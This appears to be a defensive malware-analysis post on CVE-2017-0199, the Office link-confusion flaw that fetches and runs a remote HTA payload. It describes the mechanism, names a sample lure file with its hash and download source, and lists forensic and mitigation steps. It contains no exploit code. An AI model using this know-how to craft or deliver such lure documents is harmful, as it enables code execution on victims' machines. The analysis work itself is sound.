CVE2017-0199 RTF Exploit Analysis

malware analysis CVE2017-0199

CVE-2017-0199 exploits a logical "Link Type" confusion vulnerability within Microsoft Office. By embedding a malicious link in an RTF or DOCX document, attackers can force the application to download and execute an HTA (HTML Application) payload from a remote server.

Filename: Unpaid_Invoice_829182.doc
MD5: 1cfd12688b1f93545a3dc91366c86825
Sample: Download via Reverse.it



Technical Walkthrough



Background

CVE-2017-0199 is a critical remote code execution (RCE) vulnerability affecting Microsoft Word, PowerPoint, and Excel. It leverages the OLE (Object Linking and Embedding) interface. When a victim opens a specially crafted document, the application automatically fetches a remote resource, often an HTA file, which executes arbitrary code under the user's security context without further interaction.



General Analysis Procedure

Follow these standard forensic steps to identify and analyze CVE-2017-0199 samples:

  • Static File Assessment: Inspect metadata (author, timestamps) and digital signatures. Use the file command in Linux to confirm if the document is an OLE2 binary or a disguised RTF.
  • Hex Analysis: Use a hex editor (HxD, Hexinator) to search for the OLE2 signature D0 CF 11 E0 A1 B1 1A E1. Look for the "Link" string or URLs beginning with http:// that may point to the malicious payload host.
  • Sandbox Dynamic Analysis: Execute the file within a controlled virtual environment (VirtualBox, Sandboxie). Monitor for WINWORD.EXE or EXCEL.EXE initiating outbound network requests to unusual IP addresses.
  • Automated Tools: Submit hashes to VirusTotal or use automated sandboxes like Cuckoo or Hybrid-Analysis to extract Indicators of Compromise (IOCs) such as registry changes or child process creation (e.g., mshta.exe).
  • Log Review: Analyze packet captures (Wireshark) to identify the payload download and use Process Monitor (ProcMon) to track the transition from the document application to the code execution phase.


Mitigation & Conclusion

Effective defense against CVE-2017-0199 requires keeping Microsoft Office fully patched and ensuring that Protected View remains enabled. From a network perspective, blocking outbound HTA execution and monitoring for unauthorized remote OLE object linking can significantly reduce the risk of a successful compromise.



Happy hunting.